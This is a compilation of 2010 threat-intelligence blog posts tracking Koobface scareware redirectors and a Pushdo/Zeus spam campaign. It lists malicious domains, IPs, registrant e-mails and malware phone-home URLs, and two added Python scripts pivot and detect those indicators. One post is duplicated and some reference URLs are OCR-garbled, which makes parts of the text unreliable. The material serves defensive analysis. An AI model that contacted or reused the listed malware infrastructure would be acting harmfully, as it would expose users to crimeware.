This isn't the first time that the Koobface gang is attempting to monetize traffic through dating affiliate networks. In fact, in November's "[17]Koobface Botnet's Scareware Business Model - Part Two" post, emphasizing the gang's connection with blackhat SEO campaigns, the Bahama botnet and the [18]malvertising attacks at the web site of the New York Times, I also [19]pointed out their connection with an [20]Ukrainian dating scam agency profiled before, whose botnet was also linked to [21]money mule recruitment campaigns in May, 2009.

[22]An excerpt is worth a thousand words: 

The historical OSINT paragraph mentioned that several of the scareware domains pushed during the past two weeks were responding to 62.90.136.237. This very same 62.90.136.207 IP was hosting domains part of an [23]Ukrainian dating scam agency known as [24]Confidential Connections earlier this year, whose spamming operations were linked to a [25]botnet involved in money mule recruitment activities.

For the time being, the following dating scam domains are responding to the same IP:

Could it get even more malicious and fraudulent than that? 
Appreciate my rhetoric. 


The same email (potenciallio@safe-mail.net) that was used to register the dating scam domains was also [26]used to register exploit serving domains at 195.88.190.247, [27]participate in phishing campaigns, and register a [28]money mule recruitment site for the non-existent [29]Allied Insurance LLC. (Allied Group, Inc.).

Of course, the money made in the process looks like pocket change compared to the money the gang makes through blackhat SEO, click fraud and scareware in general - go through the related posts at the bottom of the article. But since they've previously indicated what I originally anticipated they'd do sooner or later, namely start diversifying and experimenting due to the ever-growing compromised infrastructure, what they'll do next on the Mac front is an issue worth keeping an eye on.

Related Koobface gang/botnet research:

[30] The Koobface Gang Wishes the Industry "Happy Holidays"

[31] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline

[32] Koobface Botnet Starts Serving Client-Side Exploits

[33] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[34] Koobface Botnet's Scareware Business Model - Part Two

[35] Koobface Botnet's Scareware Business Model - Part One

[36] Koobface Botnet Redirects Facebook's IP Space to my Blog

[37] New Koobface campaign spoofs Adobe's Flash updater

[38] Social engineering tactics of the Koobface botnet

[39] Koobface Botnet Dissected in a TrendMicro Report

[40] Movement on the Koobface Front - Part Two

[41] Movement on the Koobface Front

[42] Koobface - Come Out, Come Out, Wherever You Are

[43] Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [44]Dancho Danchev's blog. Follow him [45]on Twitter.
PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild (2010-02-03 22:42)

Pushdo/Cutwail's customers, or perhaps the botnet masters themselves, continue rotating the malware campaigns, with the very latest one using a "Photo Archive #2070735" theme and continuing to serve client-side exploits hosted within crimeware-friendly networks it's time we profile and expose.

• [1]Extensive list of the domains/subdomains involved at Gary Warner's blog.
Photo Archives Hosting describes itself as:

"Photos Archives Hosting has a zero-tolerance policy against ILLEGAL content. All archives and links are provided by 3rd parties. We have no control over the content of these pages. We take no responsibility for the content on any website which we link to, please use your own discretion while surfing the links. © 2007-2009, Photos Archives Hosting Group, Inc. - ALL RIGHTS RESERVED."

- Sample URL: photoshock.MalwareDomain/id1073bv/get.php?email=

- Sample iFrame from this week's campaign: 109.95.115.36 /usasp22/in.php

- [2]Sample iFrame from last week: 109.95.114.251 /usOld/; 109.95.115.36 /usasp/in.php

- [3]Sample iFrame used two weeks ago: 109.95.114.251 /uksl/in.php

- Detection rate: PhotoArchive.exe ([4]Trojan-Spy.Win32.Zbot); dropped file.exe ([5]Trojan-Spy.Win32.Zbot)

Upon execution, it drops C:\WINDOWS\system32\sdra64.exe and C:\WINDOWS\system32\lowsec\user.ds, and phones back to the [6]Zeus-crimeware serving: horosta .ru/cbd/nekovo.bri ; horosta .ru/ip.php - 109.95.115.19 - Email: bernardo_pr@inbox.ru

Who's offering the hosting infrastructure for the actual domains/malware binaries and nameservers?

- [7]AS50215 (TROYAK-AS Starchenko Roman Fedorovich) - [8]profiled here

- [9]109.95.112.0/22 - [10]AS50369 - VISHCLUB-as Kanyovskiy Andriy Yuriyovich

- 193.104.41.0/24 - [11]AS49934 - VVPN-AS PE Voronov Evgen Sergiyovich

- [12]91.200.164.0/22 - [13]AS47560 - VESTEH-NET-as Vesteh LLC

What's worth pointing out is that "TROYAK-AS Starchenko Roman Fedorovich" is positioning itself as "[14]Ethernet, home, LAN, net, provider, ISP, Homenet provider" at [15]ctlan.net, just like the "[16]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot" and "[17]GazTranzitStroyInfo - a Fake Russian Gas Company Facilitating Cybercrime".

All of the involved domains have already been blacklisted by the Zeus Tracker. However, with the campaigners at large, what's TROYAK-AS today will be yet another cybercrime-friendly AS tomorrow.
Related posts:

[18] Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits

[19] Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

[20] Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

[21] Pushdo Injecting Bogus Swine Flu Vaccine

[22] "Your mailbox has been deactivated" Spam Campaign Serving Crimeware

[23] Ongoing FDIC Spam Campaign Serves Zeus Crimeware

[24] The Multitasking Fast-Flux Botnet that Wants to Bank With You



This post has been reproduced from [25]Dancho Danchev's blog. Follow him [26]on Twitter.
A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang (2010-02-04 00:50)

With [1]scareware/rogueware/fake security software continuing to be the cash-cow choice for the Koobface gang, keeping them on a short leash, in order to become the biggest [2]opportunity cost for the gang's business model, is crucial. The following are currently active blackhat SEO redirectors, Koobface-infected host redirectors and actual scareware domains courtesy of the gang.
Blackhat SEO redirectors, also embedded at Koobface-infected hosts, with identical redirector ID (?pid=312s02&sid=4dbl2f):

Upon redirection, the scareware is served from malware-b-scan .com - 96.44.128.245; 91.212.226.97; 91.212.226.185; 91.121.45.67; 91.212.226.203; 94.228.209.195 - Email: mail@bristonnews.com.
Sample detection rate for newly introduced scareware samples: [3]Setup_312s2.exe - Result: 3/40 (7.5 %), [4]Setup_312s2.exe - Result: 4/39, [5]Setup_312s22.exe - Result: 2/39 (5.13 %), [6]Setup_312s2.exe - Result: 6/39 (15.39 %), [7]Setup_312s2.exe - Result: 1/40 (2.5 %), [8]Setup_312s2.exe - Result: 1/39 (2.56 %), [9]Setup_312s2.exe - Result: 3/39 (7.7 %), [10]Setup_312s2.exe - Result: 4/40 (10 %), [11]Setup_312s2.exe - Result: 1/40 (2.5 %), [12]Setup_312s2.exe - Result: 4/40 (10 %), [13]Setup_312s2.exe - Result: 5/41 (12.2 %), [14]Setup_312s2.exe - Result: 5/41 (12.2 %), [15]Setup_312s2.exe - Result: 5/41 (12.2 %), [16]Setup_312s2.exe - Result: 4/41 (9.76 %), [17]Setup_312s2.exe - Result: 4/41 (9.76 %), [18]Setup_312s2.exe - Result: 5/41 (12.2 %), [19]Setup_312s2.exe - Result: 4/41 (9.76 %), [20]Setup_312s2.exe - Result: 3/41 (7.32 %), [21]Setup_312s2.exe - Result: 6/41 (14.63 %).

Upon execution the sample phones back to winxp7server .com/download/winlogo.bmp - 94.228.208.57; rescuesysupdate .com/?b=312s2 - 83.133.125.216. The most recent samples (Wednesday, February 10, 2010) phone back to wintimeserver .com/?b=312s2 - 91.212.226.125 and firmwaredownloadserver .com/download/winlogo.bmp - 94.228.208.57.

The most recent samples (Sunday, February 21, 2010) phone back to firmwaredownloadserver .com/download/winlogo.bmp - 94.228.208.57; shifustserver .com/download/winlogo.bmp - 94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com.

The most recent samples (Friday, February 12, 2010) phone back to firmwaredownloadserver .com/download/winlogo.bmp - 94.228.208.57; checklatestversion .com/?b=312s - 109.232.225.75.
Parked on the same IPs are more scareware domains, part of the portfolio:

Active scareware domains portfolio (blackhat SEO/Koobface pushed) parked at [22]212.150.164.190 - AS1680 - NV-ASN 013 NetVision Ltd:




What's so special about the robertsimonkroon@gmail.com email anyway? It's the fact that not only was [23]the email once again used to register [24]scareware domains twice in July, 2009, but also, as pointed out in November 2009's "[25]Koobface Botnet's Scareware Business Model - Part Two", the same email was used to register the following download locations for scareware domains pushed by the Koobface botnet:


Stay tuned for a massive Koobface-related activities update, analyzing the gang's multi-tasking throughout the entire January, 2010 - descriptive historical OSINT offers long-term value in cross-checking for connections.
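The registrant-email pivot used above for robertsimonkroon@gmail.com, and earlier for potenciallio@safe-mail.net, as an added example that is not part of the original post: it parses records in the post's own "domain .tld - IP - Email:" notation and groups them by shared e-mail and shared IP across campaigns. All domain names, IPs and e-mail addresses in the sample are constructed.

```python
"""Pivot defanged indicator records on registrant e-mail and hosting IP.

Added example, not the original post's code.  The post lists indicators as
'domain .tld - 1.2.3.4 - Email: who@example' (space before the TLD as
defanging; IP or e-mail sometimes absent).  Parse, refang, then pivot on
shared e-mail / IP across campaigns, the cross-check the post does by hand.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

_DOT = r"\s*(?:\[\.\]|\(\.\)|\.)\s*"  # a dot, possibly spaced out or bracketed
_RECORD_RE = re.compile(
    r"^(?P<domain>[A-Za-z0-9-]+(?:" + _DOT + r"[A-Za-z0-9-]+)*" + _DOT + r"[A-Za-z]{2,})"
    r"(?:\s*-\s*(?P<ip>\d{1,3}(?:" + _DOT + r"\d{1,3}){3}))?"
    r"(?:\s*-?\s*Email:?\s*(?P<email>[^\s@]+@[^\s@]+))?\s*$"
)

@dataclass(frozen=True)
class Indicator:
    domain: str
    ip: Optional[str]
    email: Optional[str]

def refang(value: str) -> str:
    """Collapse 'foo .com', 'foo[.]com' and '192 .0.2 .10' into dotted form."""
    return re.sub(_DOT, ".", value)

def parse_record(line: str) -> Optional[Indicator]:
    """Parse one list line in the post's notation; None for anything else."""
    match = _RECORD_RE.match(line.strip())
    if not match:
        return None
    ip, email = match.group("ip"), match.group("email")
    return Indicator(
        domain=refang(match.group("domain")).lower(),
        ip=refang(ip) if ip else None,
        email=email.lower() if email else None,
    )

def parse_records(text: str) -> List[Indicator]:
    return [rec for rec in map(parse_record, text.splitlines()) if rec]

def pivot(records: List[Indicator], key: str) -> Dict[str, List[str]]:
    """Map each 'email' or 'ip' value to the domains it links, when more than one."""
    groups = defaultdict(set)
    for rec in records:
        value = getattr(rec, key)
        if value:
            groups[value].add(rec.domain)
    return {v: sorted(d) for v, d in groups.items() if len(d) > 1}

def cross_campaign(parsed: Dict[str, List[Indicator]], key: str) -> Dict[str, List[str]]:
    """'email' or 'ip' values that recur across differently themed campaigns."""
    seen = defaultdict(set)
    for campaign, records in parsed.items():
        for rec in records:
            value = getattr(rec, key)
            if value:
                seen[value].add(campaign)
    return {v: sorted(c) for v, c in seen.items() if len(c) > 1}

# Constructed sample in the post's notation; names and IPs (RFC 5737) are invented.
SAMPLE_CAMPAIGNS = {
    "blackhat-seo-redirectors": """
        used-car-bargains .com - 192.0.2.10 - Email: registrant-a@example.net
        celebrity-videos-now .com - 198.51.100.7 - Email: registrant-a@example.net
        cheap-ticket-deals .com Email: registrant-b@example.org
        pretend-holiday-offer .com
    """,
    "scareware-landing": """
        pc-threat-scanner1 .com - 192.0.2.10 - Email: registrant-c@example.net
        pc-threat-scanner2 .com - 192 .0.2 .10 - Email: registrant-c@example.net
        free-av-download .org - 203.0.113.5 - Email: registrant-a@example.net
    """,
    "download-locations": """
        k4x9q2 .cn - Email: registrant-a@example.net
        m7p1w3 .cn - Email: registrant-d@example.net
    """,
}

def analyse(campaigns: Dict[str, str] = SAMPLE_CAMPAIGNS) -> Dict[str, Dict[str, List[str]]]:
    """Run both pivots over every campaign and report only the overlaps."""
    parsed = {name: parse_records(text) for name, text in campaigns.items()}
    all_records = [rec for recs in parsed.values() for rec in recs]
    return {
        "by_email": pivot(all_records, "email"),
        "by_ip": pivot(all_records, "ip"),
        "emails_across_campaigns": cross_campaign(parsed, "email"),
        "ips_across_campaigns": cross_campaign(parsed, "ip"),
    }

if __name__ == "__main__":
    for section, hits in analyse().items():
        print(section)
        for value, linked in hits.items():
            print(f"  {value}: {', '.join(linked)}")
```

Feeding it the real lists from the post (one campaign per heading) surfaces the same overlaps the text walks through by hand, such as one registrant e-mail recurring across redirector, landing-page and download-location portfolios.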



Related Koobface gang/botnet research:

[26] How the Koobface Gang Monetizes Mac OS X Traffic

[27] The Koobface Gang Wishes the Industry "Happy Holidays"

[28] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline

[29] Koobface Botnet Starts Serving Client-Side Exploits

[30] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[31] Koobface Botnet's Scareware Business Model - Part Two

[32] Koobface Botnet's Scareware Business Model - Part One

[33] Koobface Botnet Redirects Facebook's IP Space to my Blog

[34] New Koobface campaign spoofs Adobe's Flash updater

[35] Social engineering tactics of the Koobface botnet

[36] Koobface Botnet Dissected in a TrendMicro Report

[37] Movement on the Koobface Front - Part Two

[38] Movement on the Koobface Front

[39] Koobface - Come Out, Come Out, Wherever You Are

[40] Dissecting Koobface Worm's Twitter Campaign



The Diverse Portfolio of Fake Security Software Series:

[41] A Diverse Portfolio of Fake Security Software - Part Twenty Four

[42] A Diverse Portfolio of Fake Security Software - Part Twenty Three

[43] A Diverse Portfolio of Fake Security Software - Part Twenty Two

[44] A Diverse Portfolio of Fake Security Software - Part Twenty One

[45] A Diverse Portfolio of Fake Security Software - Part Twenty

[46] A Diverse Portfolio of Fake Security Software - Part Nineteen

[47] A Diverse Portfolio of Fake Security Software - Part Eighteen

[48] A Diverse Portfolio of Fake Security Software - Part Seventeen

[49] A Diverse Portfolio of Fake Security Software - Part Sixteen

[50] A Diverse Portfolio of Fake Security Software - Part Fifteen

[51] A Diverse Portfolio of Fake Security Software - Part Fourteen

[52] A Diverse Portfolio of Fake Security Software - Part Thirteen

[53] A Diverse Portfolio of Fake Security Software - Part Twelve

[54] A Diverse Portfolio of Fake Security Software - Part Eleven

[55] A Diverse Portfolio of Fake Security Software - Part Ten

[56] A Diverse Portfolio of Fake Security Software - Part Nine

[57] A Diverse Portfolio of Fake Security Software - Part Eight

[58] A Diverse Portfolio of Fake Security Software - Part Seven

[59] A Diverse Portfolio of Fake Security Software - Part Six

[60] A Diverse Portfolio of Fake Security Software - Part Five

[61] A Diverse Portfolio of Fake Security Software - Part Four

[62] A Diverse Portfolio of Fake Security Software - Part Three

[63] A Diverse Portfolio of Fake Security Software - Part Two

[64] Diverse Portfolio of Fake Security Software

This post has been reproduced from [65]Dancho Danchev's blog. Follow him [66]on Twitter.
39. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html

40. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html

41. http://ddanchev.blogspot.com/2009/12/diverse-portfolio-of-fake-security.html

42. http://ddanchev.blogspot.com/2009/07/diverse-portfolio-of-fake-security_27.html

43. http://ddanchev.blogspot.com/2009/07/diverse-portfolio-of-fake-security.html

44. http://ddanchev.blogspot.com/2009/06/diverse-portfolio-of-fake-security.html

45. http://ddanchev.blogspot.com/2009/05/diverse-portfolio-of-fake-security.html

46. http://ddanchev.blogspot.com/2009/04/diverse-portfolio-of-fake-security_16.html

47. http://ddanchev.blogspot.com/2009/04/diverse-portfolio-of-fake-security.html

48. http://ddanchev.blogspot.com/2009/03/diverse-portfolio-of-fake-security_31.html

49. http://ddanchev.blogspot.com/2009/03/diverse-portfolio-of-fake-security.html

50. http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html

51. http://ddanchev.blogspot.com/2009/01/diverse-portfolio-of-fake-security.html

52. http://ddanchev.blogspot.com/2008/11/diverse-portfolio-of-fake-security_12.html

53. http://ddanchev.blogspot.com/2008/11/diverse-portfolio-of-fake-security.html

54. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_28.html

55. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_22.html

56. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security_16.html

57. http://ddanchev.blogspot.com/2008/10/diverse-portfolio-of-fake-security.html

58. http://ddanchev.blogspot.com/2008/09/diverse-portfolio-of-fake-security_30.html

59. http://ddanchev.blogspot.com/2008/09/diverse-portfolio-of-fake-security_24.html

60. http://ddanchev.blogspot.com/2008/09/diverse-portfolio-of-fake-security.html

61. http://ddanchev.blogspot.com/2008/08/diverse-portfolio-
of-fake-securitv_25.html 


62. http://ddanchev.blo as pot.com/2008/Q8/diverse-portfolio- 
of-fake-securitv_20.html 

63. http://ddanchev.blo as pot.com/2008/08/diverse-portfolio- 
of-fake-securitv.html 

64. http://ddanchev.blo as pot.com/2007/12/diverse-portfolio- 
of-fake-securitv.html 

65. http://ddanchev.blo as pot.com/ 

66. http://twitter.com/danchodanchev 
A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang (2010-02-04 00:50)

With [1]scareware/rogueware/fake security software continuing to be the cash-cow choice for the Koobface gang, keeping them on a short leash, in order to become the biggest [2]opportunity cost for the gang's business model, is crucial. The following are the currently active blackhat SEO redirectors, the redirectors embedded at Koobface-infected hosts, and the actual scareware domains, all courtesy of the gang.
Blackhat SEO redirectors, also embedded at Koobface-infected hosts, with identical redirector ID (?pid=312s02&sid=4db12f):

freeticketwin.com - 91.212.226.25 - Email: test@now.net.cn
lotteryvideowin.com - Email: test@now.net.cn
videohototplaypoker.com - Email: test@now.net.cn
financetopsecrets.com - Email: test@now.net.cn
how2winforex.com - 91.212.226.136 - Email: test@now.net.cn
2money4money.com - Email: test@now.net.cn
get-money-quickly.com - Email: test@now.net.cn
fordusedsales .com - 193.104.106.250 - Email: test@now.net.cn
buylexuscustoms .com - 91.212.226.185 - Email: test@now.net.cn
tracegirlsonline .com - 89.248.168.22 - Email: test@now.net.cn
skypetollfree .com - 96.44.128.245 - Email: test@now.net.cn
dendy-trens .com - Email: test@now.net.cn
pretendtolove .com - Email: test@now.net.cn
bewareoffreebies .com - Email: test@now.net.cn
harry-the-potter .com - Email: test@now.net.cn
getlancomediscount .com - Email: baldwinnere@yahoo.co.uk
vincentvangoghsite .com - Email: contacts@ferra.hu
jacksonpollocksite .com - Email: contacts@ferra.hu
lady2gaga .com - Email: contacts@designt.de
nigeriaworldtours .com - Email: info@montever.de
americanpiemusicvideo .com - Email: mail@suvtrip.hu
superstitionmusicvideo .com - Email: mail@suvtrip.hu
umbrellamusicvideo .com - Email: mail@suvtrip.hu
discounts-org .com - Email: mail@haselbladtour.com
littlediscounts .com - Email: mail@haselbladtour.com
winterdiscounts5 .com - Email: mail@haselbladtour.com
chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com
volvomodeltoys .com - Email: CourtneyRWebb@aol.com
manilawebcamera .com - Email: monkey22@live.com
mumbaiwebcamera .com - Email: monkey22@live.com
karachiwebcamera .com - Email: monkey22@live.com
delhiwebcamera .com - Email: monkey22@live.com
istanbulwebcamera .com - Email: monkey22@live.com
lexusmodeltoys .com - Email: monkey22@live.com
bmwmodeltoys .com - Email: CourtneyRWebb@aol.com

Upon redirection, the scareware is served from malware-b-scan .com - 96.44.128.245; 91.212.226.97; 91.212.226.185; 91.121.45.67; 91.212.226.203; 94.228.209.195 - Email: mail@bristonnews.com.
Sample detection rate for newly introduced scareware samples:

[3]Setup_312s2.exe - Result: 3/40 (7.5 %)
[4]Setup_312s2.exe - Result: 4/39
[5]Setup_312s22.exe - Result: 2/39 (5.13 %)
[6]Setup_312s2.exe - Result: 6/39 (15.39 %)
[7]Setup_312s2.exe - Result: 1/40 (2.5 %)
[8]Setup_312s2.exe - Result: 1/39 (2.56 %)
[9]Setup_312s2.exe - Result: 3/39 (7.7 %)
[10]Setup_312s2.exe - Result: 4/40 (10 %)
[11]Setup_312s2.exe - Result: 1/40 (2.5 %)
[12]Setup_312s2.exe - Result: 4/40 (10 %)
[13]Setup_312s2.exe - Result: 5/41 (12.2 %)
[14]Setup_312s2.exe - Result: 5/41 (12.2 %)
[15]Setup_312s2.exe - Result: 5/41 (12.2 %)
[16]Setup_312s2.exe - Result: 4/41 (9.76 %)
[17]Setup_312s2.exe - Result: 4/41 (9.76 %)
[18]Setup_312s2.exe - Result: 5/41 (12.2 %)
[19]Setup_312s2.exe - Result: 4/41 (9.76 %)
[20]Setup_312s2.exe - Result: 3/41 (7.32 %)
[21]Setup_312s2.exe - Result: 6/41 (14.63 %)
[22]Setup_312s2.exe - Result: 11/41 (26.83 %)
[23]Setup_312s2.exe - Result: 4/42 (9.53 %)

Upon execution the sample phones back to winxp7server .com/download/winlogo.bmp - 94.228.208.57; rescuesysupdate .com/?b=312s2 - 83.133.125.216. The most recent samples (Wednesday, February 10, 2010) phone back to wintimeserver .com/?b=312s2 - 91.212.226.125 and firmwaredownloadserver .com/download/winlogo.bmp - 94.228.208.57.

The most recent samples (Sunday, February 21, 2010) phone back to firmwaredownloadserver .com/download/winlogo.bmp - 94.228.208.57; shifustserver .com/download/winlogo.bmp - 94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com.

The most recent samples (Friday, February 12, 2010) phone back to firmwaredownloadserver .com/download/winlogo.bmp - 94.228.208.57; checklatestversion .com/?b=312s - 109.232.225.75.

The most recent samples (Wednesday, February 24, 2010) phone back to shifustserver .com/download/winlogo.bmp - 94.228.208.57 - Email: viinzer@hotmail.com and versionupgrade .com/?b=312s12 - 89.248.168.21. Parked on the same IP are also checklatestversion .com and fastwinupdates .com.
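The redirector ID (?pid=312s02&sid=...) and the phone-home URLs above share one recurring element, the 312s campaign id, alongside a fixed beacon path and a small set of hosts. The following Python is an added example, not tooling from the post or its author: it runs those three checks over proxy log lines. The host names are the ones the post lists (written defanged there as "name .com"), the log lines are constructed, and the Squid native access.log layout is an assumption.

```python
"""Flag proxy-log requests matching the Koobface scareware redirector and
phone-home patterns described in the post.

Added example, not the post's own tooling. Host names are the ones the post
lists; the log lines below are constructed and the Squid native access.log
layout is an assumption.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Phone-home and update hosts named in the post.
PHONE_HOME_HOSTS = {
    "winxp7server.com", "rescuesysupdate.com", "wintimeserver.com",
    "firmwaredownloadserver.com", "shifustserver.com",
    "checklatestversion.com", "versionupgrade.com", "fastwinupdates.com",
}

# Beacon path the post reports on several of those hosts.
PHONE_HOME_PATH = "/download/winlogo.bmp"

# Campaign id family seen in both the redirector ID (?pid=312s02) and the
# phone-home query (?b=312s2, ?b=312s12, ?b=312s).
CAMPAIGN_ID = re.compile(r"^312s\d*$")

# Squid native access.log: time elapsed client code/status bytes method URL ...
SQUID_LINE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+(?P<client>\S+)\s+\S+\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def classify_url(url):
    """Return a reason string when the URL matches a pattern from the post, else None.

    Checks run from most to least specific: a known host, then the beacon path
    on any host, then the campaign id in either query parameter the post shows.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in PHONE_HOME_HOSTS:
        return "known-phone-home-host"
    if parts.path.lower() == PHONE_HOME_PATH:
        return "winlogo.bmp-beacon-path"
    query = parse_qs(parts.query)
    for key in ("b", "pid"):
        for value in query.get(key, []):
            if CAMPAIGN_ID.match(value):
                return f"campaign-id:{key}={value}"
    return None


def scan_proxy_log(lines):
    """Return one finding dict per log line whose URL classify_url() flags."""
    findings = []
    for line in lines:
        m = SQUID_LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than guessing at fields
        reason = classify_url(m.group("url"))
        if reason:
            findings.append({
                "ts": m.group("ts"),
                "client": m.group("client"),
                "url": m.group("url"),
                "reason": reason,
            })
    return findings


# Constructed sample log; example.* hosts and 203.0.113.x are documentation
# ranges used as benign filler and as a stand-in for an unlisted host.
SAMPLE_LOG = [
    "1265798400.101    215 10.0.0.5 TCP_MISS/200 1530 GET http://www.example.org/index.html - DIRECT/203.0.113.2 text/html",
    "1265798402.334     98 10.0.0.5 TCP_MISS/302 412 GET http://freeticketwin.com/?pid=312s02&sid=4db12f - DIRECT/91.212.226.25 text/html",
    "1265798431.550    640 10.0.0.7 TCP_MISS/200 94208 GET http://firmwaredownloadserver.com/download/winlogo.bmp - DIRECT/94.228.208.57 image/bmp",
    "1265798440.012     77 10.0.0.7 TCP_MISS/200 120 GET http://unlisted-host.example/?b=312s12 - DIRECT/203.0.113.9 text/plain",
    "1265798455.700    301 10.0.0.9 TCP_MISS/200 94208 GET http://cdn.example.net/download/winlogo.bmp - DIRECT/203.0.113.20 image/bmp",
    "1265798460.005     54 10.0.0.9 TCP_HIT/200 880 GET http://shop.example.com/item?b=1 - NONE/- text/html",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['reason']} {hit['url']}")
```

The two generic checks (beacon path, campaign id) are what catch the fourth and fifth sample lines, whose hosts are not in the post; the host list alone would have missed them, which is the point of pivoting on the invariant parts of the URL rather than on domains the gang rotates.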
Parked on the same IPs are more scareware domains part of the portfolio:

interlantivirus.com - 87.98.130.232 - Email: test@now.net.cn
virus-scan-d.com - 87.98.130.232 - Email: test@now.net.cn
bl9-virus-scanner.com - 87.98.130.232 - Email: test@now.net.cn
intera-antivirus.com - 87.98.130.232 - Email: test@now.net.cn
interc-antivirus.com - 87.98.130.232 - Email: test@now.net.cn
interd-antivirus.com - 87.98.130.232 - Email: test@now.net.cn
intere-antivirus.com - 87.98.130.232 - Email: test@now.net.cn
inter-antivirus.com - 87.98.130.232 - Email: test@now.net.cn
195.5.161.107/psxl/?vih==RANDOM_STRINGS - no domain name
91.212.132.241/psxl/?vih==RANDOM_STRINGS
195.5.161.105/psxl/?vih==RANDOM_STRINGS
non-antivirus-scan .com - Email: test@now.net.cn
zin-antivirus-scan .com - Email: test@now.net.cn
nextgen-scannert .com - Email: test@now.net.cn
protection15scan .com - Email: test@now.net.cn
nitro-antispyware .com - Email: test@now.net.cn
z2-antispyware .com - Email: test@now.net.cn
spy-detectore .com - Email: admin@clossingt.com
dis7-antivirus .com - Email: admin@vertigosmart.com
v2comp-scanner .com - Email: admin@vertigosmart.com
new-av-scannere .com - Email: missbarlingmail@aol.com
smartvirus-scan6 .com - Email: info@terranova.com
spywaremaxscan4 .com - Email: out@trialzoom.com
super6antispyware .com - Email: mail@ordercom.com
spyware-max-scan3 .com - Email: out@trialzoom.com
max-antivirus-security5 .com - Email: mail@dynadoter.com
winterdiscounts5 .com - Email: mail@haselbladtour.com
11-antivirus .com - Email: call555call@live.com
1-antivirus .com - Email: call555call@live.com
1m-online-scanner .com - Email: stellar2@yahoo.com
2m-online-scanner .com - Email: stellar2@yahoo.com
2pro-antispyware .com - Email: mail@yahoo.com
3pro-antispyware .com - Email: mail@yahoo.com
6-antivirus .com - Email: call555call@live.com
7-antivirus .com - Email: call555call@live.com
9-antivirus .com - Email: call555call@live.com
a0-online-scanner .com - Email: stellar2@yahoo.com
a9-online-scanner .com - Email: stellar2@yahoo.com
aa-antivirus .com - Email: call555call@live.com
aa-online-scanner .com - Email: call555call@live.com
ab-antivirus .com - Email: call555call@live.com
ac-antivirus .com - Email: call555call@live.com
ad-antivirus .com - Email: call555call@live.com
adv1-system-scanner .com - Email: JayRKibbe@live.com
adv2-system-scanner .com - Email: JayRKibbe@live.com
ae-antivirus .com - Email: call555call@live.com
antivirus-expert-a .com - Email: 900ekony@live.com
antivirus-expert-i .com - Email: 900ekony@live.com
antivirus-expert-r .com - Email: 900ekony@live.com
antivirus-expert-y .com - Email: 900ekony@live.com
antivirussystemscan1 .com - Email: 900ekony@live.com
antivirussystemscana .com - Email: 900ekony@live.com
army-antispywarea .com - Email: beliec99@yahoo.com
army-antispywarei .com - Email: beliec99@yahoo.com
army-antispywarel .com - Email: beliec99@yahoo.com
army-antispywarep .com - Email: beliec99@yahoo.com
army-antivirusa .com - Email: beliec99@yahoo.com
army-antivirusd .com - Email: beliec99@yahoo.com
army-antivirust .com - Email: beliec99@yahoo.com
army-antivirusv .com - Email: beliec99@yahoo.com
army-antivirusy .com - Email: beliec99@yahoo.com
b1-online-scanner .com - Email: stellar2@yahoo.com
best-antivirusk0 .com
bestpd-virusscanner .com - Email: SusanCWagner@yahoo.com
bestpr-virusscanner .com - Email: SusanCWagner@yahoo.com
crystal-antimalware .com - Email: mail@vertigocats.com
crystal-antivirus .com - Email: mail@vertigocats.com
crystal-pro-scan .com - Email: mail@vertigocats.com
crystal-pro-scanner .com - Email: mail@vertigocats.com
crystal-spyscanner .com - Email: mail@vertigocats.com
crystal-threatscanner .com - Email: mail@vertigocats.com
crystal-virusscanner .com - Email: mail@vertigocats.com
extra-spyware-defencea .com - Email: fabula8@live.com
extra-spyware-defenceb .com - Email: fabula8@live.com
malware-a-scan .com - Email: mail@bristonnews.com
malware-b-scan .com - Email: mail@bristonnews.com
malware-c-scan .com - Email: mail@bristonnews.com
malware-d-scan .com - Email: mail@bristonnews.com
malware-t-scan .com - Email: mail@bristonnews.com
mega-antispywarea .com - Email: fabula8@live.com
mega-antispywareb .com - Email: fabula8@live.com
mm-online-scanner .com - Email: stellar2@yahoo.com
my-computer-antivirusa .com - Email: dillinzerl@yahoo.com
my-computer-antivirusb .com - Email: dillinzerl@yahoo.com
my-computer-antiviruse .com - Email: dillinzerl@yahoo.com
my-computer-antivirusq .com - Email: dillinzerl@yahoo.com
my-computer-antivirusw .com - Email: dillinzerl@yahoo.com
my-computer-scanc .com - Email: clintommail2@yahoo.com
my-computer-scane .com - Email: clintommail2@yahoo.com
my-computer-scanl .com - Email: clintommail2@yahoo.com
my-computer-scannera .com - Email: clintommail2@yahoo.com
my-computer-scannerl .com - Email: clintommail2@yahoo.com
my-computer-scannerm .com - Email: clintommail2@yahoo.com
my-computer-scannern .com - Email: clintommail2@yahoo.com
my-computer-scannerv .com - Email: clintommail2@yahoo.com
my-computer-scanw .com - Email: clintommail2@yahoo.com
my-pc-online-scanm .com - Email: dillinzerl@yahoo.com
my-pc-online-scann .com - Email: dillinzerl@yahoo.com
